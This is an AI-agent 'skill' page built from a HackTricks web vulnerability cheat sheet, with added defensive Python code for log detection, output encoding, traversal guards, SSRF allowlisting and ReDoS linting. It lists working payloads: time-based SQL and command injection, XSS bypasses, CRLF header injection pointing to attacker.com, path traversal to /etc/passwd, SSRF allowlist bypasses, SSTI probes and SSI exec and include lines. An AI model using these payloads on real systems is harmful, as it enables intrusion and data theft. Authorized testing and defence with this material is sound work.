Hacktricks-skills web-vulns-cheatsheet

Web vulnerability payloads and testing techniques for security assessments. Use this skill whenever the user is doing penetration testing, bug bounty hunting, security research, or needs web vulnerability payloads (SQL injection, XSS, path traversal, SSRF, SSTI, etc.). Trigger on requests for exploit payloads, vulnerability testing, security audit help, or when analyzing web application security.

Install

Source: clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list/SKILL.MD

Source content

Web Vulnerabilities Cheatsheet

A comprehensive reference for web vulnerability payloads and testing techniques. Use this during security assessments, penetration testing, or bug bounty hunting.

Quick Reference by Vulnerability Type

SQL Injection

Time-based blind SQLi payloads:

  • 1;sleep(9);#
    - MySQL
  • ';sleep(9);#
    - MySQL with quote
  • ";sleep(9);#
    - MySQL with double quote
  • /*$(sleep 5)
    - Unix command injection variant
  • /*`sleep 5``*/
    - Backtick variant

Polyglot payloads (work across multiple contexts):

{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
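The detection side of the payloads above, as an added example that is not part of the HackTricks skill or the upstream repo: signatures derived from the listed time-based and polyglot strings are matched against percent-decoded request parameters, and the response latency recorded in an access log is compared with the delay the payload asked for, so a defender can tell a probe from a confirmed injection. The log format (combined log with response time appended), the log lines and all function names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the HackTricks skill: detect the time-based SQLi and
# command-injection payloads from the cheat sheet in request parameters and log lines,
# and use the logged response latency to judge whether the delay actually executed.

# Signatures derived from the listed payloads. They run against a normalized value:
# percent-decoded twice, ${IFS} turned back into a space, lower-cased.
TIMING_SIGNATURES = {
    "sql_sleep_call": re.compile(r"\bsleep\s*\(\s*\d+\s*\)"),           # sleep(9), sleep(5)
    "shell_sleep": re.compile(r"(?:\$\(|`|;|\|\||&&)\s*sleep\s+\d+"),  # $(sleep 5), `sleep 5`, ;sleep 9
    "comment_terminator": re.compile(r"/\*|\*/|#\s*$|--\s"),          # /* ... */, trailing #, --
}
INJECTION_TAGS = {"sql_sleep_call", "shell_sleep"}
DELAY_SECONDS = re.compile(r"sleep\s*\(?\s*(\d+)")

# Constructed access-log lines (hypothetical format: combined log plus response time in
# seconds as the last field); addresses and timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=42 HTTP/1.1" 200 512 0.012',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=1%3Bsleep(9)%3B%23 HTTP/1.1" 200 512 9.031',
    '10.0.0.9 - - [01/Jan/2024:10:00:11 +0000] "GET /search?q=%27%3Bsleep(9)%3B%23&page=1 HTTP/1.1" 200 512 9.027',
    '10.0.0.9 - - [01/Jan/2024:10:00:21 +0000] "GET /ping?host=%2F*%24(sleep%205) HTTP/1.1" 500 77 5.004',
]
LOG_LINE = re.compile(
    r'"(?:GET|POST|PUT) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \d+ (?P<latency>[\d.]+)$'
)


def normalize(value: str) -> str:
    """Undo the encodings a parameter passes through before it reaches a query or a shell."""
    decoded = unquote_plus(unquote_plus(value))  # second pass catches double-encoding
    decoded = decoded.replace("${IFS}", " ")     # shell field separator used in place of a space
    return decoded.lower()


def classify(value: str) -> set:
    """Return the names of all signatures that match the normalized value."""
    norm = normalize(value)
    return {name for name, rx in TIMING_SIGNATURES.items() if rx.search(norm)}


def is_timing_injection(value: str) -> bool:
    """True when the value carries a delay primitive, not merely a comment terminator."""
    return bool(classify(value) & INJECTION_TAGS)


def split_query(query: str):
    """Split on '&' only: parse_qsl on older Pythons also splits on ';', which would shred the payloads."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def scan_log_line(line: str) -> list:
    """Report every parameter carrying a timing payload; mark it confirmed when the logged
    latency is at least the delay the payload requested."""
    m = LOG_LINE.search(line)
    if not m or "?" not in m.group("path"):
        return []
    latency = float(m.group("latency"))
    findings = []
    for name, value in split_query(m.group("path").split("?", 1)[1]):
        tags = classify(value)
        if not tags & INJECTION_TAGS:
            continue
        delay = DELAY_SECONDS.search(normalize(value))
        requested = int(delay.group(1)) if delay else None
        findings.append({
            "param": name,
            "tags": sorted(tags),
            "latency": latency,
            "confirmed": requested is not None and latency >= requested,
        })
    return findings


def scan_log(lines) -> list:
    """Flatten findings over many lines, keeping the line index for triage."""
    return [(i, f) for i, line in enumerate(lines) for f in scan_log_line(line)]


if __name__ == "__main__":
    for index, finding in scan_log(SAMPLE_LOG):
        print(index, finding)
```

The latency comparison is what separates a blocked or ignored probe from one that reached the database or shell: a request carrying sleep(9) that returned in 20 ms is noise, one that took 9 seconds is an incident.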

Cross-Site Scripting (XSS)

Basic XSS payloads:

  • <script>alert(1)</script>
  • <img src=x onerror=alert(1)>
  • javascript:alert(1)
  • " onclick=alert(1)//

Advanced XSS bypasses:

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
"><marquee><img src=x onerror=confirm(1)></marquee>"
"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>

XSS with HTTP header injection:

%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
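The server-side controls that neutralise the XSS and header-injection payloads above, as an added example that is not part of the HackTricks skill or the upstream repo: a CR/LF check on anything destined for a response header, a redirect builder that only accepts path-only targets, and the three output encodings (HTML body, attribute, URL) that the basic XSS payloads are written to exploit. All function names are hypothetical.

```python
import html
from urllib.parse import unquote, urlsplit

# Added example, not part of the HackTricks skill: the checks that stop the header-injection
# and XSS payloads from the cheat sheet from taking effect. Function names are hypothetical.


def header_value_is_safe(value: str) -> bool:
    """Reject any value carrying CR, LF or NUL, raw or percent-encoded: a single CRLF is all
    the Location-splitting payloads need, so it must never reach a header."""
    for candidate in (value, unquote(value)):
        if any(ch in candidate for ch in ("\r", "\n", "\x00")):
            return False
    return True


def build_location_header(target: str):
    """Return a Location header for a same-site, path-only redirect target, or None.
    Absolute, protocol-relative and '/\\' targets are refused so the redirect cannot be
    pointed off-site even when the CRLF check passes."""
    if not header_value_is_safe(target):
        return None
    parts = urlsplit(target)
    if parts.scheme or parts.netloc or not target.startswith("/") or target.startswith(("//", "/\\")):
        return None
    return "Location: " + target


def render_comment(user_text: str) -> str:
    """HTML body context: entity-encode so <script> and <img onerror=...> become inert text."""
    return "<p>" + html.escape(user_text, quote=True) + "</p>"


def render_title_attribute(user_text: str) -> str:
    """Attribute context: quote=True also encodes the quote a '\" onclick=...' payload needs
    to break out of the attribute."""
    return '<input type="text" title="' + html.escape(user_text, quote=True) + '">'


def safe_href(url: str) -> str:
    """URL context: only http(s) and relative links survive; 'javascript:' and every other
    scheme are replaced by a harmless '#'."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme and scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_link(url: str, label: str) -> str:
    """Combine the URL and attribute encodings for an anchor built from user data."""
    return '<a href="' + safe_href(url) + '">' + html.escape(label, quote=True) + "</a>"
```

Note that each encoder is bound to one context; the body encoder does nothing for a value dropped into an event handler or a script block, which is why the polyglot payloads above try several contexts at once.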

Path Traversal

Unix/Linux paths:

  • /etc/passwd
  • /etc/hostname
  • /../../../../../../etc/hosts

Windows paths:

  • C:/windows/system32/drivers/etc/hosts
  • ..\\..\\..\\..\\..\\..\\windows/system32/drivers/etc/hosts

Mixed traversal patterns:

  • ..\\..\\..\\..\\..\\..\\etc/hosts
  • ..\\..\\..\\..\\..\\..\\windows/system32/drivers/etc/hosts
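A file-serving helper that refuses every traversal pattern listed above, as an added example that is not part of the HackTricks skill or the upstream repo: the user-supplied name is percent-decoded, backslashes are treated as separators the way Windows does, absolute and drive-letter paths are rejected outright, and the resolved path must still sit under the document root. The base directory is hypothetical and does not need to exist for the checks to work.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Added example, not part of the HackTricks skill: map a user-supplied file name onto a
# path and refuse anything that escapes the document root. BASE_DIR is hypothetical.

BASE_DIR = "/srv/app/public"
DRIVE_LETTER = re.compile(r"^[A-Za-z]:")


class TraversalError(ValueError):
    """Raised for any name that does not stay inside the document root."""


def resolve_under(base_dir: str, requested: str) -> Path:
    base = Path(base_dir).resolve()
    name = unquote(requested)              # '..%2F..' arrives encoded when the framework does not decode
    if "\x00" in name:
        raise TraversalError("NUL byte in file name")
    name = name.replace("\\", "/")         # Windows accepts both separators; normalize before checking
    if name.startswith("/") or DRIVE_LETTER.match(name):
        raise TraversalError("absolute paths are not file names: %r" % requested)
    candidate = (base / name).resolve()    # collapses every '..' lexically, and symlinks where present
    # The decisive check: the resolved path must still be strictly inside the resolved base.
    if base not in candidate.parents:
        raise TraversalError("path escapes document root: %r" % requested)
    return candidate


def is_safe_name(requested: str, base_dir: str = BASE_DIR) -> bool:
    """Boolean wrapper for policy checks and tests."""
    try:
        resolve_under(base_dir, requested)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    for probe in ("report.pdf", "/etc/passwd", "..\\..\\..\\..\\..\\..\\etc/hosts"):
        print(repr(probe), "->", "serve" if is_safe_name(probe) else "reject")
```

Checking the resolved path against the resolved base, rather than looking for the substring "..", is what makes the encoded, mixed-separator and symlink variants fail the same way as the plain ones.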

Server-Side Request Forgery (SSRF)

External resource access:

  • http://asdasdasdasd.burpcollab.com/mal.php
  • \\asdasdasdasd.burpcollab.com/mal.php

Domain bypass techniques:

  • www.whitelisted.com.evil.com
    - Subdomain injection
  • //google.com
    - Protocol-relative bypass
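The allowlist check that both bypasses above are aimed at, as an added example that is not part of the HackTricks skill or the upstream repo: the allowed name has to be the whole host or a dot-delimited suffix of it (so www.whitelisted.com.evil.com fails), the scheme has to be http or https (so the schemeless //google.com fails), and backslash and userinfo forms are refused before the host is even compared. The allowlist and function names are hypothetical.

```python
from urllib.parse import urlsplit

# Added example, not part of the HackTricks skill: validate a user-supplied URL against a
# host allowlist before the server fetches it. ALLOWED_HOSTS is hypothetical.

ALLOWED_HOSTS = {"whitelisted.com"}


class SSRFError(ValueError):
    """Raised when a URL must not be fetched on the user's behalf."""


def host_is_allowed(host: str, allowed=ALLOWED_HOSTS) -> bool:
    """Exact match or a subdomain of an allowed host. The '.' boundary is what defeats
    'www.whitelisted.com.evil.com': the allowed name must be the suffix, not a prefix."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def validate_fetch_url(url: str, allowed=ALLOWED_HOSTS) -> str:
    url = url.strip()
    if "\\" in url:
        raise SSRFError("backslash in URL")  # '\\host\share' and '/\' forms never get parsed
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        # '' here covers protocol-relative '//google.com', which urlsplit leaves schemeless
        raise SSRFError("scheme not allowed: %r" % parts.scheme)
    if parts.username is not None or parts.password is not None:
        raise SSRFError("userinfo in URL")   # 'http://whitelisted.com@evil.com' points at evil.com
    host = parts.hostname
    if not host or not host_is_allowed(host, allowed):
        raise SSRFError("host not in allowlist: %r" % host)
    return parts.geturl()


def is_safe_fetch_url(url: str, allowed=ALLOWED_HOSTS) -> bool:
    """Boolean wrapper for policy checks and tests."""
    try:
        validate_fetch_url(url, allowed)
        return True
    except SSRFError:
        return False
```

This validates only the string; a complete control also pins the resolved address at connect time and refuses redirects, since a permitted host can still redirect the fetcher elsewhere.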

Server-Side Template Injection (SSTI)

Template engine detection:

{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%

Jinja2/Python SSTI:

  • {{7*7}}
    - Basic expression
  • ${{7*7}}
    - Nested syntax

ASP/Classic ASP:

  • <%= 7*7 %>

Ruby ERB:

  • <%[%'"}}%
    - Mixed-delimiter variant

XML External Entity (XXE)

XSLT and ESI include payloads:

<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

Server-Side Include (SSI)

SSI injection:

<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>

Regular Expression Denial of Service (ReDoS)

Vulnerable regex patterns:

  • (\w*)+$
    - Catastrophic backtracking
  • ([a-zA-Z]+)*$
    - Nested quantifiers
  • ((a+)+)+$
    - Multiple nested groups
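A static lint for the shape shared by the three patterns above (an unbounded repeat inside another unbounded repeat), as an added example that is not part of the HackTricks skill or the upstream repo. It walks the tree produced by the standard library's own regex parser rather than timing matches, so it can sweep a rule file in milliseconds; the sample patterns and function names are constructed.

```python
# Added example, not part of the HackTricks skill: flag regexes whose nested unbounded
# quantifiers make catastrophic backtracking possible. A hit means "review this", not
# "this is exploitable"; a miss does not prove the pattern safe.
try:
    from re import _parser as sre_parse        # Python 3.11+ location of the parser
    from re import _constants as sre_constants
except ImportError:                            # older interpreters expose the public shims
    import sre_parse
    import sre_constants

REPEAT_OPS = {sre_constants.MAX_REPEAT, sre_constants.MIN_REPEAT}


def _subpatterns(value):
    """Yield every SubPattern nested in an opcode's argument (group bodies,
    branch alternatives, lookaround bodies)."""
    if isinstance(value, sre_parse.SubPattern):
        yield value
    elif isinstance(value, (tuple, list)):
        for item in value:
            yield from _subpatterns(item)


def _nested_unbounded(node, inside_unbounded=False) -> bool:
    """True if an unbounded repeat (*, +, {n,}) sits inside another unbounded repeat."""
    for op, value in node:
        if op in REPEAT_OPS:
            _lo, hi, body = value
            unbounded = hi == sre_constants.MAXREPEAT
            if unbounded and inside_unbounded:
                return True
            if _nested_unbounded(body, inside_unbounded or unbounded):
                return True
        else:
            for sub in _subpatterns(value):
                if _nested_unbounded(sub, inside_unbounded):
                    return True
    return False


def has_nested_unbounded_repeat(pattern: str) -> bool:
    return _nested_unbounded(sre_parse.parse(pattern))


def audit_patterns(patterns) -> dict:
    """Map each pattern to its verdict, for sweeping a validation-rule file."""
    return {p: has_nested_unbounded_repeat(p) for p in patterns}


# Constructed sample: the three patterns from the cheat sheet plus two without nesting.
SAMPLE_PATTERNS = [
    r"(\w*)+$",
    r"([a-zA-Z]+)*$",
    r"((a+)+)+$",
    r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$",
    r"^\d{1,3}(?:\.\d{1,3}){3}$",
]

if __name__ == "__main__":
    for pattern, flagged in audit_patterns(SAMPLE_PATTERNS).items():
        print("REVIEW " if flagged else "ok     ", pattern)
```

The lint is deliberately simple: it also flags nested repeats that a fixed separator makes linear (such as `(?:[a-z]+-)*`), and it misses the other classic ReDoS shape, overlapping alternation under a repeat (`(a|a)*`). Backtracking-free engines such as RE2 or a hard match timeout remain the mitigation of record.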

Testing Workflow

1. Reconnaissance

  • Identify input vectors (URL parameters, POST data, headers, cookies)
  • Map application technology stack
  • Check for WAF/IPS presence

2. Payload Testing

  • Start with simple payloads to confirm vulnerability
  • Escalate to complex payloads for exploitation
  • Test polyglot payloads for context-independent injection

3. Verification

  • Use time-based delays for blind vulnerabilities
  • Check for out-of-band callbacks (e.g. Burp Collaborator)
  • Verify file access for path traversal
  • Confirm code execution for SSTI/SSRF

4. Documentation

  • Record successful payloads
  • Note application behavior
  • Capture evidence (screenshots, logs)

Important Notes

Legal & Ethical:

  • Only test systems you have explicit authorization to assess
  • Document all findings for responsible disclosure
  • Follow bug bounty program rules and scope

Safety:

  • Test in isolated environments when possible
  • Avoid destructive payloads in production
  • Use time-based detection over data exfiltration during initial testing

Context Matters:

  • Payloads may need encoding based on context (URL, HTML, JavaScript)
  • WAFs may block common patterns - try variations
  • Application-specific filters may require custom payloads

When to Use This Skill

Use this skill when:

  • Conducting authorized penetration tests
  • Participating in bug bounty programs
  • Learning web security concepts
  • Needing quick reference for vulnerability payloads
  • Analyzing web application security issues
  • Preparing security assessments

Do NOT use this skill for:

  • Unauthorized access to systems
  • Malicious activities
  • Testing without proper authorization
  • Any illegal purposes